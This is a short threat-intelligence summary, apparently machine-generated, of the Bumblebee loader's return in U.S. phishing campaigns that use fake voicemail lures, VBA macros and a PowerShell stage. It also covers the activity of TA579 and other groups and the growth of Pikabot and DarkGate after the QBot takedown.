February 13, 2024 at 10:47AM
The Bumblebee malware, previously attributed to cybercrime syndicates Conti and Trickbot, has resurfaced in phishing campaigns targeting organizations in the U.S. The recent campaign uses fake voicemail notifications and malicious documents with VBA macros to introduce the Bumblebee DLL into victims’ systems. This marks a departure from previous distribution methods and suggests testing of new approaches. Additionally, other threat actors, such as TA579, TA576, TA866, TA582, and TA2541, have shown increased activities. The resurgence of malware loaders like Pikabot and emergence of new variants, such as a simplified version of Pikabot, indicate a shift in the cybercrime landscape following law enforcement disruption of QBot.
Key takeaways from the meeting notes are as follows:
1. The Bumblebee malware has reappeared after a four-month hiatus, spreading in phishing campaigns targeting numerous organizations in the United States.
2. This malware, developed as a replacement for the BazarLoader backdoor, is being distributed through fake voicemail notifications, using a OneDrive URL to download a Word document containing a VBA macro.
3. The VBA macro creates a script file, executing a PowerShell command that fetches and executes the next stage from a remote server, culminating in the deployment of the Bumblebee DLL on the victim’s system.
4. This campaign’s use of VBA macros is notable due to Microsoft’s decision to block macros by default in 2022, making it more challenging for the campaign to succeed.
5. Previous Bumblebee campaigns used different methods for payload delivery, but the current attack represents a significant departure, possibly due to evasion tactics or a focus on outdated systems.
6. Cybercriminals rent Bumblebee to introduce their payloads into already-compromised systems.
7. The recent campaign does not have enough evidence to attribute it to any specific threat group, but it displays characteristics tracked by the TA579 threat actors.
8. Other threat actors showing increased activity include TA576, TA866, TA582, and TA2541.
9. The disruption of QBot by law enforcement has opened up opportunities for other malware, such as DarkGate and Pikabot, to fill the void in the payload distribution market.
10. Zscaler reported a resurgence of Pikabot with a new, simplified version following a hiatus after Christmas last year, indicating a revamped variant in the early release stage.
These clear takeaways provide a concise summary of the main points covered in the meeting notes.